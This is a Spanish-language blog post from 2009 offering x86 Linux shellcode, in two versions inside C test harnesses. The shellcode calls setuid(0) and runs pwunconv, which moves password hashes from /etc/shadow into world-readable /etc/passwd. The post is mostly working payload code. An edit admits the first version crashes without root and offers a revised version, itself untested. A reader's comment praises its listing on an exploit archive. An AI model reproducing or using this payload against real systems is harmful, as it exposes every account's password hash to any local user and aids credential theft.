Curiosity is insubordination in its purest form. -Vladimir Nabokov

domingo, 5 de julio de 2009

unshadow.c shellcode

Este shellcode deshabilita el shadowing en un sistema Linux. Todos los passwords de /etc/shadow van a /etc/passwd , legible por todo el mundo :)

#include <stdio.h>

const char sc[]= "\x31\xdb" //xor ebx,ebx
"\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push and pop!
"\x99" //cdq
"\xcd\x80" //int 80 //setuid(0) shouldn't returns -1 right? ;)
"\xb0\x0b" //mov al,0bh
"\x52" //push edx /Termina la cadena con un 0
"\x68\x63\x6f\x6e\x76" //push dword "conv"
"\x68\x70\x77\x75\x6e" //push dword "pwun"
"\x68\x62\x69\x6e\x2f" //push dword "bin/"
"\x68\x73\x72\x2f\x73" //push dword "sr/s"
"\x68\x2f\x2f\x2f\x75" //push dword "///u"
"\x89\xe3" //mov ebx,esp
"\x89\xd1" //mov ecx,edx
"\xcd\x80"; //int 80h

void main()
{
printf("\n~ This shellcode disables shadowing on a linux system ~"
"\n\n\t ~ Coded by vlan7 ~"
"\n\t ~ http://www.vlan7.org ~"
"\n\n ~ Date: 4/Jul/2009"

"\n\tYou'll have the passwords stored in /etc/passwd."
"\n\tFor undo purposes use the pwconv command."
"\n\t ~ Shellcode Size: %d bytes\n\n",
sizeof(sc)-1);

(*(void (*)()) sc)();
}


<EDIT>
No es correcta tanta optimizacion, el shellcode fue escrita sin probarla en la practica en un exploit. Si no eres ya root, da un Segmentation Fault "asin" de grande. Todo por ahorrar un byte aprovechandose de que el retorno de una funcion se guarda en EAX.
</EDIT>

Ahi va la correcta, de 1 byte mas, aunque pendiente de probar en la practica, deberia funcionar con toda seguridad:

#include <stdio.h>

const char sc[]= "\x31\xdb" //xor ebx,ebx
"\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push and pop!
"\x99" //cdq
"\xcd\x80" //int 80 //setuid(0) shouldn't returns -1 right? ;)
"\x8d\x43\x0b" //LEA eax,[ebx + 0x0b]
"\x52" //push edx /Termina la cadena con un 0
"\x68\x63\x6f\x6e\x76" //push dword "conv"
"\x68\x70\x77\x75\x6e" //push dword "pwun"
"\x68\x62\x69\x6e\x2f" //push dword "bin/"
"\x68\x73\x72\x2f\x73" //push dword "sr/s"
"\x68\x2f\x2f\x2f\x75" //push dword "///u"
"\x89\xe3" //mov ebx,esp
"\x89\xd1" //mov ecx,edx
"\xcd\x80"; //int 80h

void main()
{
printf("\n~ This shellcode disables shadowing on a linux system ~"
"\n\n\t ~ Coded by vlan7 ~"
"\n\t ~ http://www.vlan7.org ~"
"\n\n ~ Date: 4/Jul/2009"

"\n\tYou'll have the passwords stored in /etc/passwd."
"\n\tFor undo purposes use the pwconv command."
"\n\t ~ Shellcode Size: %d bytes\n\n",
sizeof(sc)-1);

(*(void (*)()) sc)();
}

Related Posts by Categories



1 comentarios :

admin dijo...

Vaya te acabo de ver en http://www.packetstormsecurity.org/filedesc/unshadow-vlan7.c.html

Vaya tela, estas hecho un crack, felicidades y sigue con el trabajo bien hecho.